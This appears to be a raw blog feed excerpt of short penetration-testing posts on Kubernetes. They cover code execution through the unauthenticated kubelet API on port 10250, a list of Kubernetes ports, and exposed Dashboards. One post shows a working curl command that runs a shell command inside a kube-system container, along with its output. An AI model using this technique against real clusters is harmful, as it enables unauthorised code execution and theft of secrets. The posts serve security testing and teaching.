href=\"https:\/\/4.bp.blogspot.com\/-GHY7haQcnDE\/XDUHQZWqIXI\/AAAAAAAACZo\/BMj3R44FEJoYE4KaFBdNePBOKDwsHijBQCLcBGAs\/s1600\/namespace-name%2B2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"676\" data-original-width=\"1408\" height=\"191\" src=\"https:\/\/4.bp.blogspot.com\/-GHY7haQcnDE\/XDUHQZWqIXI\/AAAAAAAACZo\/BMj3R44FEJoYE4KaFBdNePBOKDwsHijBQCLcBGAs\/s400\/namespace-name%2B2.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/3.bp.blogspot.com\/-D9391tlICUs\/XDUHVwoW64I\/AAAAAAAACZs\/M2s1N-B3TMABaS8CLYu6tH3t-c-AtW3vgCLcBGAs\/s1600\/container-name%2B2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"572\" data-original-width=\"1510\" height=\"151\" src=\"https:\/\/3.bp.blogspot.com\/-D9391tlICUs\/XDUHVwoW64I\/AAAAAAAACZs\/M2s1N-B3TMABaS8CLYu6tH3t-c-AtW3vgCLcBGAs\/s400\/container-name%2B2.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\nleaves you with:\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: left;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -k -XPOST \"https:\/\/kube-node-here:10250\/run\/kube-system\/kube-dns-5b8bf6c4f4-k5n2g\/dnsmasq\" -d \"cmd=ls -la \/\"\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Etotal 35264\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 .\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 ..\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Nov\u0026nbsp; 9 16:27 .dockerenv\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 bin\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;380 Nov\u0026nbsp; 9 16:27 dev\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E-rwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; 36047205 Apr 13\u0026nbsp; 2018 dnsmasq-nanny\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 etc\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 home\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 lib\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 5 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 media\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 mnt\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edr-xr-xr-x\u0026nbsp; 125 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Nov\u0026nbsp; 9 16:27 proc\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwx------\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 root\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 run\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 sbin\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 2 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Jan\u0026nbsp; 9\u0026nbsp; 2018 srv\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edr-xr-xr-x\u0026nbsp; \u0026nbsp;12 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;0 Nov\u0026nbsp; 9 16:27 sys\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxrwxrwt\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 17:00 tmp\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 7 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 usr\u003C\/span\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both;\"\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edrwxr-xr-x\u0026nbsp; \u0026nbsp; 1 root\u0026nbsp; \u0026nbsp; \u0026nbsp;root\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; 4096 Nov\u0026nbsp; 9 16:27 var\u003C\/span\u003E\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8143265817877621541\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=8143265817877621541","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8143265817877621541"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8143265817877621541"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-unauth-kublet-api-10250.html","title":"Kubernetes: unauth kublet API 10250 basic code exec"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/4.bp.blogspot.com\/-GHY7haQcnDE\/XDUHQZWqIXI\/AAAAAAAACZo\/BMj3R44FEJoYE4KaFBdNePBOKDwsHijBQCLcBGAs\/s72-c\/namespace-name%2B2.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-4433258289414572962"},"published":{"$t":"2019-01-14T16:31:00.001-05:00"},"updated":{"$t":"2019-01-14T16:31:05.375-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: List of ports"},"content":{"type":"html","$t":"\u003Cspan style=\"font-family: inherit;\"\u003EOther Kubernetes ports\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; color: #333333; margin-bottom: 10px;\"\u003E\n\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003EWhat are some of the visible ports used in Kubernetes?\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv style=\"font-size: 14px;\"\u003E\n\u003Cspan style=\"font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003C\/div\u003E\n\u003C\/div\u003E\n\u003Cdiv style=\"background-color: white; box-sizing: border-box; color: #333333; margin-bottom: 10px;\"\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003E44134\/tcp - Helmtiller, weave, calico\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E10250\/tcp - kubelet (kublet exploit)\u003C\/span\u003E\u003C\/li\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003ENo authN, completely open\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\/pods\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\/runningpods\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003E\/containerLogs\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E10255\/tcp - kublet port (read-only)\u003C\/span\u003E\u003C\/li\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E\/stats\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E\/metrics\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E\/pods\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E4194\/tcp - cAdvisor\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"box-sizing: border-box; font-family: inherit;\"\u003E2379\/tcp - etcd (see it on other ports though)\u003C\/span\u003E\u003C\/li\u003E\n\u003Cul\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003EEtcd holds all the configs\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003EConfig storage\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003E30000 - dashboard\u003C\/span\u003E\u003C\/li\u003E\n\u003Cli\u003E\u003Cspan style=\"font-family: inherit;\"\u003E443\/6443 - api\u003C\/span\u003E\u003C\/li\u003E\n\u003C\/ul\u003E\n\u003C\/div\u003E\n"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/4433258289414572962\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=4433258289414572962","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/4433258289414572962"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/4433258289414572962"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-list-of-ports.html","title":"Kubernetes: List of ports"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-3920313307202663833"},"published":{"$t":"2019-01-11T09:00:00.001-05:00"},"updated":{"$t":"2019-01-11T09:00:00.434-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: Kubernetes Dashboard"},"content":{"type":"html","$t":"\u003Cbr \/\u003E\nTesla was \u003Ca href=\"https:\/\/arstechnica.com\/information-technology\/2018\/02\/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware\/\" target=\"_blank\"\u003Efamously hacked\u003C\/a\u003E for leaving this open and it's pretty rare to find it exposed externally now but useful to know what it is and what you can do with it.\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nUsually found on port 30000\u003Cbr \/\u003E\n\u003Cbr \/\u003E\nkube-hunter finding for it:\u003Cbr \/\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003EVulnerabilities\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+-----------------------+---------------+----------------------+----------------------+------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| LOCATION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | CATEGORY\u0026nbsp; \u0026nbsp; \u0026nbsp; | VULNERABILITY\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | DESCRIPTION\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | EVIDENCE\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;|\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+-----------------------+---------------+----------------------+----------------------+------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E| 1.2.3.4:30000\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Remote Code\u0026nbsp; \u0026nbsp;| Dashboard Exposed\u0026nbsp; \u0026nbsp; | All oprations on the | nodes: pach-okta |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp;| Execution\u0026nbsp; \u0026nbsp; \u0026nbsp;|\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; | cluster are exposed\u0026nbsp; |\u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; \u0026nbsp; |\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E+-----------------------+---------------+----------------------+----------------------+------------------+\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\u003Cspan style=\"font-family: inherit; font-size: xx-small;\"\u003EWhy do you care?\u0026nbsp; It has access to all pods and secrets within the cluster. So rather than using command line tools to get secrets or run code you can just do it in a web browser.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: inherit; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: inherit; font-size: xx-small;\"\u003EScreenshots of what it looks like:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/1.bp.blogspot.com\/-51OAca_ARCE\/XC-bhR7yF7I\/AAAAAAAACYo\/y1IUfXAJt1wT0joA6UlILL4AdAFfGp6NQCLcBGAs\/s1600\/dashboard1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"1008\" data-original-width=\"1600\" height=\"201\" src=\"https:\/\/1.bp.blogspot.com\/-51OAca_ARCE\/XC-bhR7yF7I\/AAAAAAAACYo\/y1IUfXAJt1wT0joA6UlILL4AdAFfGp6NQCLcBGAs\/s320\/dashboard1.png\" width=\"320\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nviewing secrets\u003C\/div\u003E\n\u003Cspan style=\"font-family: inherit; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/d33wubrfki0l68.cloudfront.net\/349824f68836152722dab89465835e604719caea\/6e0b7\/images\/docs\/ui-dashboard.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"478\" data-original-width=\"800\" height=\"238\" src=\"https:\/\/d33wubrfki0l68.cloudfront.net\/349824f68836152722dab89465835e604719caea\/6e0b7\/images\/docs\/ui-dashboard.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nutilization\u003C\/div\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace; font-size: xx-small;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/d33wubrfki0l68.cloudfront.net\/767cfea1ac5847b732e40ddd1ea13e638b679f8f\/7be79\/images\/docs\/ui-dashboard-logs-view.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"478\" data-original-width=\"800\" height=\"238\" src=\"https:\/\/d33wubrfki0l68.cloudfront.net\/767cfea1ac5847b732e40ddd1ea13e638b679f8f\/7be79\/images\/docs\/ui-dashboard-logs-view.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nlogs\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Cbr \/\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/user-images.githubusercontent.com\/608862\/29508542-d7e67470-864c-11e7-838c-90bbb9c09daa.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cimg border=\"0\" data-original-height=\"315\" data-original-width=\"800\" height=\"156\" src=\"https:\/\/user-images.githubusercontent.com\/608862\/29508542-d7e67470-864c-11e7-838c-90bbb9c09daa.png\" width=\"400\" \/\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\nshells\u003C\/div\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/3920313307202663833\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment.g?blogID=8539880144347728238\u0026postID=3920313307202663833","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/3920313307202663833"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/3920313307202663833"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/01\/kubernetes-kubernetes-dashboard.html","title":"Kubernetes: Kubernetes Dashboard"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/1.bp.blogspot.com\/-51OAca_ARCE\/XC-bhR7yF7I\/AAAAAAAACYo\/y1IUfXAJt1wT0joA6UlILL4AdAFfGp6NQCLcBGAs\/s72-c\/dashboard1.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-414728220328607858"},"published":{"$t":"2019-01-11T09:00:00.000-05:00"},"updated":{"$t":"2019-01-11T09:00:03.332-05:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"cloud"},{"scheme":"http://www.blogger.com/atom/ns#","term":"devoops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"hacking"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Kubernetes"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Kubernetes: Kubelet API 